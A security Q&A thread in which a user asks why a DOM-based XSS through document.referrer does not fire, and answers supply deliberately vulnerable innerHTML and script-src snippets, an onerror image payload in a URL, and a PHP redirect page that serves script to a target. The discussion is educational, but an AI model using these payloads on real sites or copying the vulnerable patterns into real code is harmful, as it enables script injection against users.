11

A very simple example...

<div id="cat"></div>
<script>
document.getElementById("cat").innerHTML = document.referrer;
</script>

or 

<script src="' + document.referrer + '"></script>

I've tried simply sending the request and adding a referrer header, but that doesn't seem to echo onto the page.

Michael Blake
  • 751
  • 1
  • 12
  • 22
  • Perhaps your browser has some integrated "protection" against reflected XSS. – CodesInChaos Aug 27 '14 at 07:56
  • @CodesInChaos I've tried two separate versions of Firefox. Also, I'm not setting the referrer header to anything harmful and it still doesn't work for the first example. – Michael Blake Aug 27 '14 at 08:01
  • @CodesInChaos That always bugs me, but it is spelled "referrer". – Michael Blake Aug 27 '14 at 08:07
  • 1
    actually for me it works both on FF and chrome – aviv Aug 27 '14 at 08:18
  • @aviv I've tried multiple times with Chrome and Firefox with the following page: http://jsfiddle.net/4zaz1uga/ and I get the same result every time. – Michael Blake Aug 27 '14 at 08:26
  • assigning to `innerHTML` doesn't run ` – Mike Samuel Aug 27 '14 at 14:27
  • @MikeSamuel Thank you, but the referrer isn't changed at all. I'm not trying to even run any javascript. For example, if I go to http://jsfiddle.net/4zaz1uga/ from here, it should display this question's URL, but instead, it shows http://jsfiddle.net. – Michael Blake Aug 27 '14 at 19:50
  • @MichaelBlake, sorry, I misunderstood which part was the payload and which was the container. – Mike Samuel Aug 28 '14 at 13:11

2 Answers2

5

Updated browsers will encode the referrer URL.

So your examples will not work to trigger XSS nowadays.

Try this: 

<div id="cat"></div>
<script>
document.getElementById("cat").innerHTML = decodeURIComponent(document.referrer);
</script>

JSFIDDLE:

http://jsfiddle.net/y4afy8h9/1/?<img%20src=x%20onerror=alert(9)>?

Lucas NN
  • 1,336
  • 8
  • 21
2

The following code is vulnerable to DOM based XSS, because the attacker-controlled value of document.referrer is tracked by the browser:

<script src="' + document.referrer + '"></script>

The code above can be exploited using a page that upon first load redirects the browser to your target, on the 2nd load it returns an XSS payload. One way of doing this is checking the referer on the server-side:

<?php
if($_SERVER['HTTP_REFERER'] == 'http://target.com/xss'){
   print "alert('xss')";
}else{
   header("location: http://target.com/xss")
}
?>

When the page http://target.com/xss loads, javascript from document.referer it will load alert('xss').

rook
  • 46,916
  • 10
  • 92
  • 181